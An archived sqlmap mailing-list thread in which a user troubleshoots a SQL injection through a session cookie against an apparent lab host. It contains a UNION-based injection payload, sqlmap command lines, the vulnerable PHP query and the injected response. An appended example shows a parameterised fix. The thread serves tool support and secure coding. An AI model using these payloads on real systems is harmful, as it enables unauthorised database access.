Hi Stephen.
There is really a problem here. Could you please update to the latest
revision and do the:
... --flush-session -t traffic.txt -v 3
and send back new session file. It seems that for some reason sqlmap is
doing only one type of boundaries in your case (skipping this simple: ') ...
Also, it would be great if you could send the full console output of such a clean run
(please, use -v 3).
Kind regards,
Miroslav Stampar
On Sun, Sep 16, 2012 at 9:33 PM, Stephen Shkardoon <s...@ss23.geek.nz> wrote:
> Hi,
>
> This is the HTML from a manual request with sesh cookie set
> to ')%20UNION%20select%201,2,3,4%20--%20
>
> <html>
> <head>
> <link rel='stylesheet' href='css/styles.css'/>
> <title>My Account - Customer Care Centre - Acme Power Co</title>
> </head>
> <body>
>
> <div id='heading'>
> </div>
>
> <div id='menu'>
> <a href='index.php'>Home / Login</a> -
> <a href='account.php'>My Account</a> -
> <a href='support.php'>Contact Support</a> -
> <a href='#'
> onClick='javascript:window.open("hours.php?data=ccc","newwin","width=210,height=200")'>CCC
> Opening Hours</a> -
> <a href='logout.php'>Logout</a>;
> </div>
>
>
> <div id='content'>
> <div id='billz'>
> Hi, 2!<br><br> Have a token:
> 86a2aeef8813bfa37a354e8997c77388<br><br>Please find below your account
> statement, released 04 November 2011. This account is due to be paid on
> <b>05 November 2011</b>. Failure to pay this amount before the due date may
> result in service disruption.<br><br><h3>Account
> Statement</h3><hr><table><tr><td width=200>Account Number</td><td
> width=450>Description of
> Service</td><td>Amount</td></tr></table><hr><table><tr><td
> width=200>1</td><td width=450>Basic Power
> Service</td><td>4</td></tr></table>
> </div>
> </div>
>
> </body>
> </html>
>
> ---------------------------
>
> The relevant bits being "Hi, 2", and the table showing amount of "4" etc.
>
> Thanks,
> ss23
>
> On Mon, Sep 17, 2012 at 6:58 AM, Miroslav Stampar <
> miroslav.stam...@gmail.com> wrote:
>
>> Hi Stephen.
>>
>> From this traffic file it's not really clear if this is exploitable by
>> any means other than time-based.
>>
>> Could you please send the response you get when you "manually exploit" it
>> with the payload you've mentioned:
>> "sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Sat, Sep 15, 2012 at 1:33 AM, Stephen Shkardoon <s...@ss23.geek.nz> wrote:
>>
>>> It ran a little over and started testing User-Agent, but it has the
>>> entire log for the session cookie there.
>>> The options I used this time were:
>>> python2 sqlmap.py -u "http://10.100.0.26/account.php" --cookie="sesh=1"
>>> -t traffic.txt --level=5
>>>
>>> Thanks,
>>> ss23
>>>
>>>
>>> On Sat, Sep 15, 2012 at 10:31 AM, Miroslav Stampar <
>>> miroslav.stam...@gmail.com> wrote:
>>>
>>>> Hi.
>>>>
>>>> In that case could you please send the sqlmap traffic file got by using
>>>> -t traffic.txt along with your standard switches/options?
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>>
>>>> On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon
>>>> <s...@ss23.geek.nz> wrote:
>>>>
>>>>> Hi,
>>>>>
>>>>> Sorry, my mistake. I just copied the line and altered it to show that
>>>>> the cookie was being used. In the real script, there was no parse error.
>>>>> Nonetheless, sqlmap cannot pull out results.
>>>>>
>>>>> Thanks
>>>>> ss23
>>>>>
>>>>> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <
>>>>> miroslav.stam...@gmail.com> wrote:
>>>>>
>>>>>> Hi.
>>>>>>
>>>>>> I am not sure how you are able to be "definitely able to pull out
>>>>>> results", as, as far as I can see, the problem lies in the PHP used (a pair of
>>>>>> single quotes enclosed within another pair of single quotes):
>>>>>>
>>>>>> Bad:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu
>>>>>> WHERE
>>>>>> sessionid = '$_COOKIE['sesh']')");
>>>>>>
>>>>>> Good 1:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu
>>>>>> WHERE
>>>>>> sessionid = '$_COOKIE[sesh]')");
>>>>>>
>>>>>> Good 2:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu
>>>>>> WHERE
>>>>>> sessionid = " . $_COOKIE['sesh'] . ")");
>>>>>>
>>>>>> With that code of yours you should get an ugly PHP error message:
>>>>>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>>>>>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>>>>>
>>>>>> Also, you could take a look at similar case here [1].
>>>>>>
>>>>>> Kind regards,
>>>>>> Miroslav Stampar
>>>>>>
>>>>>> [1]
>>>>>> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>>>>>
>>>>>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <s...@ss23.geek.nz
>>>>>> > wrote:
>>>>>>
>>>>>>> Hi all,
>>>>>>>
>>>>>>> Trying to do a (simple) injection with sqlmap, and I can't seem to
>>>>>>> coax it into getting it right.
>>>>>>> The PHP source looks something like:
>>>>>>>
>>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu
>>>>>>> WHERE
>>>>>>> sessionid = '$_COOKIE['sesh']')");
>>>>>>>
>>>>>>> and then it displays the fields it pulled out.
>>>>>>>
>>>>>>> The command(s) I've tried look something like ./sqlmap.py -u
>>>>>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>>>>>> --risk=5. However, the only injection point it finds is AND/OR
>>>>>>> time-based
>>>>>>> blind, which is horribly slow. Of course, manually, I can do a
>>>>>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>>>>>> I'm definitely able to pull out results.
>>>>>>>
>>>>>>> Anything I can do to push sqlmap in the right direction?
>>>>>>>
>>>>>>> Thanks,
>>>>>>> ss23
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
>>>>>>
>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
--
Miroslav Stampar
http://about.me/stamparm
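The account lookup discussed in this thread, shown as an added example (not code from the thread or from sqlmap) in the form that removes the injection entirely: the cookie value is bound as a parameter instead of being interpolated into the SQL text, which also makes the `$_COOKIE['sesh']` vs `$_COOKIE[sesh]` parse-error question moot. The PDO DSN, credentials and the session-id shape checked by the regex are assumptions; table and column names are those quoted in the thread.

```php
<?php
// Added example, not from the thread: the thread's query rewritten with a
// prepared statement, beside the concatenated form it replaces.
// Assumptions: a MySQL database "ccc" reachable via PDO, and session ids that
// are short alphanumeric strings (the thread shows "1" and a 32-char hex token).

// Concatenated form (the shape discussed in the thread). The cookie value
// becomes part of the SQL text, so a value containing a quote or parenthesis
// changes the structure of the query rather than the value being compared.
function build_query_concatenated(string $sesh): string
{
    return "SELECT userid, custname, custemail, owing FROM custdata AS cd "
         . "WHERE cd.userid = (SELECT userid FROM ccc_users AS cu "
         . "WHERE sessionid = '" . $sesh . "')";
}

// Hardened form: the SQL text is a constant and the cookie value travels to
// the server as a bound parameter, so it can only ever be compared as data.
function lookup_account(PDO $pdo, string $sesh): ?array
{
    $sql = "SELECT userid, custname, custemail, owing FROM custdata AS cd "
         . "WHERE cd.userid = (SELECT userid FROM ccc_users AS cu "
         . "WHERE sessionid = :sesh)";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':sesh', $sesh, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hypothetical request handling: read the cookie once, reject anything that
// does not look like a session id (defence in depth, independent of binding),
// then run the parameterised lookup.
$sesh = $_COOKIE['sesh'] ?? '';
if (!preg_match('/^[A-Za-z0-9]{1,64}$/', $sesh)) {
    http_response_code(400);
    exit('invalid session');
}
$pdo = new PDO('mysql:host=localhost;dbname=ccc;charset=utf8mb4', 'ccc_app', 'password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares, not client-side quoting
]);
$account = lookup_account($pdo, $sesh);
if ($account === null) {
    http_response_code(403);
    exit('unknown session');
}
echo 'Hi, ' . htmlspecialchars($account['custname'], ENT_QUOTES, 'UTF-8') . '!';
```

With the parameterised form, sqlmap's boundary tests against the sesh cookie (the `'` and `')` prefixes discussed above) no longer reach the SQL parser as syntax, which is the observable difference a retest should show.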
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users